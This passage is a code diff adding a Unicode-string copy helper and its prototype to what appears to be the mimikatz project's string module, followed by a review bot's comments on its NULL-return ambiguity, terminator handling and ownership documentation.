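the typedef so nobody later adds a field to it.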
diff --git a/modules/kull_m_string.c b/modules/kull_m_string.c
index 070779d..bf11ba0 100644
--- a/modules/kull_m_string.c
+++ b/modules/kull_m_string.c
@@ -358,6 +358,22 @@ BOOL kull_m_string_copyA(LPSTR *dst, LPCSTR src)
 return status;
 }
 
+PWSTR kull_m_string_unicode_to_string(PCUNICODE_STRING src)
+{
+ PWSTR ret = NULL;
+
+ if(src->Length && src->Buffer)
+ {
+ ret = (PWSTR) LocalAlloc(LPTR, src->Length + sizeof(wchar_t));
+ if(ret)
+ {
+ RtlCopyMemory(ret, src->Buffer, src->Length);
+ }
+ }
+
+ return ret;
+}
+
 BOOL kull_m_string_quickxml_simplefind(LPCWSTR xml, LPCWSTR node, LPWSTR *dst)
 {
 BOOL status = FALSE;
diff --git a/modules/kull_m_string.h b/modules/kull_m_string.h
index 5139d37..445e0ed 100644
--- a/modules/kull_m_string.h
+++ b/modules/kull_m_string.h
@@ -95,6 +95,7 @@ BOOL kull_m_string_copy_len(LPWSTR *dst, LPCWSTR src, size_t size);
 BOOL kull_m_string_copy(LPWSTR *dst, LPCWSTR src);
 BOOL kull_m_string_copyA_len(LPSTR *dst, LPCSTR src, size_t size);
 BOOL kull_m_string_copyA(LPSTR *dst, LPCSTR src);
+PWSTR kull_m_string_unicode_to_string(PCUNICODE_STRING src);
 BOOL kull_m_string_quickxml_simplefind(LPCWSTR xml, LPCWSTR node, LPWSTR *dst);
 #if !defined(MIMIKATZ_W2000_SUPPORT)
 BOOL kull_m_string_quick_base64_to_Binary(PCWSTR base64, PBYTE *data, DWORD *szData);
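Review bot: `kull_m_string_unicode_to_string` returns `NULL` both when `LocalAlloc` fails and when `src` is empty (`Length == 0` or `Buffer == NULL`), so a caller cannot tell an empty name from an out-of-memory condition, and a valid empty `UNICODE_STRING` is silently treated as a failure. If that is intended, say so in the header; otherwise drop the `src->Length` test and let the empty case allocate just the terminator (the `src->Buffer` test can stay). The terminator is never written explicitly and depends on `LPTR` zero-filling the extra `sizeof(wchar_t)`, which deserves the comment `// LPTR zero-fills, so the extra wchar_t is the NUL terminator` next to the allocation. The prototype in kull_m_string.h should also state ownership, e.g. `// Returns a LocalAlloc'd, NUL-terminated copy; caller frees with LocalFree(). NULL on empty input or allocation failure.`, since the only visible caller relies on both facts.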